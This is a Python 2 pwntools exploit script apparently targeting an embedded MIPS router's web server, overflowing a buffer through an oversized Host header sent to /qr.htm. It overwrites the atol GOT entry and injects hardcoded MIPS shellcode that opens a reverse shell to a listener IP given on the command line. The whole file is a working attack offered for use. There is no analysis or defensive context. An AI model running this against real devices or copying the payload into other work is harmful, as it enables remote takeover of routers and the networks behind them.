#! /usr/bin/python2

from pwn import *
import sys
import urllib2
import urllib
import base64

class WebService:
    def __init__(self, ip, port=80):
        self.rooturl = "http://" + ip + ':' + str(port)

    def make_req(self, path, arg=None, host='192.168.0.1', has_ContentLength=False):
#        print "making request"
        headers = {'Host': host}
        if has_ContentLength:
            headers['Content-Length'] = '0'
        if arg is not None:
            parameter = arg
            parameter = urllib.urlencode(parameter)
            fullurl = self.rooturl + path + '?' + parameter
        else:
            fullurl = self.rooturl + path
        req = urllib2.Request(fullurl, None, headers)
        response = urllib2.urlopen(req)
        data = response.read()
        return data


def shellcode(ip):  # port listen : 31337
    ip = p32(int(socket.inet_aton(ip).encode('hex'),16))
    shell = "\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28"
    shell += "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    shell += "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    shell += "\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01"
    shell += "\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24"
    shell += "\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20"
    shell += "\xf8\xff\xa5\xaf" + ip[:2][::-1] + "\x05\x3c" + ip[2:][::-1] + "\xa5\x34\xfc\xff\xa5\xaf"
    shell += "\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24"
    shell += "\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf"
    shell += "\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28"
    shell += "\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23"
    shell += "\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28"
    shell += "\xab\x0f\x02\x24\x0c\x09\x09\x01"
    return shell

def exploit(ip):
    target_ip='192.168.0.1'
    w = WebService(target_ip)  # Router IP
    l_host_addr = 0x438154 
    atol_got_addr = 0x423780 - 4 
    host_padding = 'a' * 512
    #shellcode_addr = l_host_addr + 0x40
    shellcode_addr = 0x41414141

    print "[+] Sending exploit to ip:%s" % (target_ip)
    host_str = host_padding + 'aaaa' +  p32(shellcode_addr)
    w.make_req('/qr.htm', host=host_str)
    print "[+] Overflowing buffer"
    host_str = host_padding + p32(atol_got_addr)
    w.make_req('/qr.htm', host=host_str)
    print "[+] Overwriting got entry"
    w.make_req('/qr.htm', {'_':'hello'})   # Write

    host_str = 'q'*0x40 + shellcode(ip)
    w.make_req('/qr.htm', host=host_str)
    try:
        w.make_req('/qr.htm', has_ContentLength=True)
    except Exception:
        pass
    print "[+] Done!"



if __name__ == '__main__':
    context.arch='mips'
    if len(sys.argv) != 2:
        print 'Usage: %s <listen ip addr>'
        exit()
    exploit(sys.argv[1])

